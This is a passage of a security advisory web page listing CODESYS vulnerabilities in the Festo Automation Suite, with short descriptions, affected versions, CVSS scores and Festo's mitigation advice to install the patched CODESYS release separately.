<p>An authenticated remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47387">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/78.html">CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47388</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47388">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47389</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47389">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47390</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a stack based out-of-bounds write vulnerability in the CmpTraceMgr Component of multiple CODESYS products in multiple versions to write data into the stack which can lead to a denial-of-service condition, memory overwriting, or remote code execution.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47390">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>8.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47391</a></h3>
<div class="csaf-accordion-content">
<p>In multiple CODESYS products in multiple versions an unauthorized, remote attacker may use a improper input validation vulnerability to read from invalid addresses leading to a denial of service.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47391">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47392</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a improper input validation vulnerability in the CmpApp/CmpAppBP/CmpAppForce Components of multiple CODESYS products in multiple versions to read from an invalid address which can lead to a denial-of-service condition.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47392">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2022-47393</a></h3>
<div class="csaf-accordion-content">
<p>An authenticated, remote attacker may use a Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in multiple versions of multiple CODESYS products to force a denial-of-service situation.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2022-47393">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/119.html">CWE-119 Improper Restriction of Operations within the Bounds of a Memory Buffer</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>6.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2023-3662</a></h3>
<div class="csaf-accordion-content">
<p>In CODESYS Development System versions from 3.5.17.0 and prior to 3.5.19.20 a vulnerability allows for execution of binaries from the current working directory in the users context .</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2023-3662">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>CODESYS in Festo Automation Suite</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>FESTO, CODESYS</div>
<div class="ics-version"><strong>Product Version:</strong><br>FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (versions prior to 2.8.0.138) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.0): vers:all/*, FESTO, CODESYS FESTO Software Festo Automation Suite (2.8.0.137) installed with CODESYS Software CODESYS Development System (3.5.16.10): vers:all/*</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>FESTO has identified the following specific workarounds and mitigations users can apply to reduce risk:</p>
<p><strong>Mitigation</strong><br>Starting from Festo Automation Suite version 2.8.0.138, Codesys is no longer bundled with the suite and must be downloaded and installed separately by the customer. To mitigate this vulnerability customers are advised to: Download the latest, patched version of Codesys directly from the official Codesys website. Follow the installation and update instructions provided by Codesys to ensure all security fixes are applied. Regularly monitor Codesys security advisories and apply updates promptly. Maintain the Festo Automation Suite connector up to date by installing FAS updates as released by Festo.</p>
<p><strong>Mitigation</strong><br>The following product versions have been fixed:</p>
<p><strong>Mitigation</strong><br>CODESYS Development System 3.5.21.20 as an external component of Festo Automation Suite 2.8.0.138 are fixed versions for all CVEs</p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json">https://festo.csaf-tp.certvde.com/.well-known/csaf/white/2026/fsa-202601.json</a></p>
<p><strong>Mitigation</strong><br>For more information see the associated Festo SE &amp; Co. KG security advisory FSA-202601 FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - CSAF, FSA-202601: Several CODESYS vulnerabilities in Festo Automation Suite - HTML.<br><a href="https://certvde.com/en/advisories/VDE-2025-108">https://certvde.com/en/advisories/VDE-2025-108</a></p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/427.html">CWE-427 Uncontrolled Search Path Element</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.3</td>
<td>HIGH</td>
